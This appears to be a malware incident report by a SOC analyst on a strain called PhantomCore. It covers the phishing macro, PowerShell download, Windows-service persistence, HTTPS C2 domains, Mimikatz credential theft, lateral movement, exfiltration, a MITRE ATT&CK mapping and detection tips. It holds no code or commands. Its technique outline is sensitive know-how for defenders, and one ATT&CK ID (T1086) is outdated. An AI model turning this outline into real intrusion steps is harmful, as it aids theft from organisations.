Daniel Osei — SOC Lead & Malware Analyst
Key Takeaways
- Strong routines for initial access, often leveraging social engineering techniques.
- Custom-built downloader used for payload execution and persistence via Windows services.
- Established C2 infrastructure utilizing HTTPS for encrypted communications to evade detection.
Executive Summary
During our investigation into a recent malware incident that deployed a sophisticated variant known as PhantomCore, we observed a precise and calculated attack chain. The malware’s construction showcased the actor’s ability to merge tactics for initial access, persistence, lateral movement, and exfiltration with advanced techniques. Our analysis revealed that the attack likely targeted enterprise environments, leveraging known vulnerabilities in conjunction with social engineering to achieve footholds into critical systems.
Initial Access
Initial access was gained through a meticulously crafted phishing email containing a malicious attachment. This document, designed to impersonate legitimate business communications, contained an embedded macro that upon activation executed a PowerShell command. This command downloaded the initial stage of PhantomCore, which we identified as a small dropper file. The dropper was responsible for setting the foundation for the subsequent stages of the attack. We noted that this type of initial access leverages the T1566 – Phishing technique from MITRE ATT&CK.
Execution & Persistence
Once the dropper was executed, it downloaded a more sophisticated payload from a remote server. This payload utilized a technique we are familiar with: the use of a Windows Service to ensure persistence. Specifically, it registered itself in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ as a new service that would launch at system boot. This action allowed the malware to maintain a presence on the compromised system even after user logoff or system reboots. Furthermore, it established subtle beaconing mechanisms to check in with the command-and-control (C2) server. This aligns with T1547 – Boot or Logon Autostart Execution from the MITRE framework.
Command and Control
The C2 infrastructure we analyzed was robustly designed to disguise its communications. The actor configured PhantomCore to communicate over HTTPS, thereby obfuscating the traffic and making detection significantly more challenging. We discovered multiple domains utilized for C2, with certificate pinning in place to prevent interception. During our investigation, domain names such as update-server[.]com and data-service[.]net were linked to the ongoing management of the malware. Our mining of network logs showed a consistent beaconing pattern, with requests made at random intervals, making the detection strategy even more complex. This showcased the actors’ application of T1071.001 – Application Layer Protocol: Web Protocols.
Lateral Movement & Discovery
Following successful installation, the malware began lateral movement within the network. Utilizing Windows Management Instrumentation (WMI) for remote execution, we noted several attempts to harvest credentials using Mimikatz. The malware employed T1086 – PowerShell to run scripts that invoked RDP sessions, allowing the actor to move across different machines with elevated privileges. Additionally, we observed the enumeration of network shares which is critical for identifying sensitive data repositories to target. The significant use of T1210 – Exploitation of Remote Services was also evident as the actor attempted to exploit known vulnerabilities within the environment.
Impact & Objectives
The objectives of PhantomCore appeared to be multifaceted, including data exfiltration and potential reconnaissance to prepare for further attacks. During our analysis, we identified evidence of sensitive data being compressed and packaged within the infected network, ready for transmission. This data was routed through the previously identified C2 channels before reaching the final destination, showcasing the actor’s intent to harvest intellectual property. Furthermore, by running scripts that accessed and queried internal directories, T1087 – Account Discovery became a focal point as the actor sought operational insights that could aid in further exploits.
MITRE ATT&CK Mapping
- T1566 – Phishing: The actor delivered the initial payload via a phishing campaign, using social engineering tactics to trick users into enabling the malicious macro.
- T1547 – Boot or Logon Autostart Execution: The malware established persistence by registering itself as a Windows service.
- T1071.001 – Application Layer Protocol: Web Protocols: The C2 communication was secured via HTTPS, efficiently disguising the data exchange.
- T1086 – PowerShell: Used for executing scripts crucial to the malware’s operation.
- T1210 – Exploitation of Remote Services: Facilitated lateral movement throughout the network by exploiting vulnerabilities.
- T1087 – Account Discovery: To identify accounts that would enrich the actor’s understanding of the target environment.
Detection Opportunities
- Monitor for unusual process creation associated with PowerShell and WMI, especially those attempting to reach external domains.
- Implement strict filtering of outbound HTTPS traffic to detect anomalies in C2 communications.
- Utilize honeypots or decoy documents to track phishing attempts and analyze the techniques employed by the actors.
Analyst Notes
The PhantomCore incident serves as a stark reminder of the importance of robust email security protocols and user education to prevent initial access vectors from succeeding. Organizations should invest heavily in monitoring tools that analyze traffic patterns and system behaviors to identify anomalies generated by such sophisticated malware. Further emphasis on threat hunting initiatives is crucial to uncovering the lateral movement within networks before data exfiltration takes place.
Source: Original Report